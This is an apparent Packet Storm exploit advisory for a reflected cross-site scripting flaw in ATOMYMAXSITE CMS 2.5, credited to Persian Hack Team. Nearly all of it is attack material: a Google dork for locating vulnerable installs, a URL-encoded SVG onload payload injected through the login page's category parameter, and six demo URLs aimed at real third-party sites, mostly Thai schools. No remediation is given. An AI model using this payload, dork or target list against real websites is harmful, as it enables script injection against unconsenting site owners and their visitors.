ATOMYMAXSITE 2.5 Cross Site Scripting

2015-12-24T00:00:00
ID PACKETSTORM:135063
Type packetstorm
Reporter T3NZOG4N
Modified 2015-12-24T00:00:00

Description

                                        
                                            `######################  
# Exploit Title : ATOMYMAXSITE CMS Cross Site Scripting  
# Exploit Author : Persian Hack Team  
# Vendor Homepage : http://maxtom.sytes.net/  
# Google Dork : "Power by : ATOMYMAXSITE 2.5" OR Powered by ATOMYMAXSITE 2.5  
# Date: 2015/12/23  
# Version = 2.5  
#######################  
# Payload : ">Persian<svg%2Fonload%3Dconfirm(%2FMobhaM%2F)>Hack Team  
#   
# Demo:  
#  
#http://www.phetchabun2.com/index.php/login?name=blog&category=6%22%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20%20Team  
#  
#http://www.edu.ubru.ac.th/index.php/login?name=blog&category=6%22%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20%20Team  
#  
#http://www.ppaosportschool.ac.th/index.php/login?name=blog&category=6%22%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20%20Team  
#  
#http://www.wangdan.ac.th/index.php/login?name=blog&category=6%22%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20%20Team  
#  
#http://www.nonswang.org/index.php/login?name=blog&category=6%22%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20%20Team  
#  
#http://www.cpmpoly.ac.th/index.php/login?name=blog&category=6%22%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20%20Team  
#  
######################  
# Discovered by :  
# Mojtaba MobhaM (kazemimojtaba@live.com)  
# T3NZOG4N (t3nz0g4n@yahoo.com)  
# Homepage : persian-team.ir  
######################   
`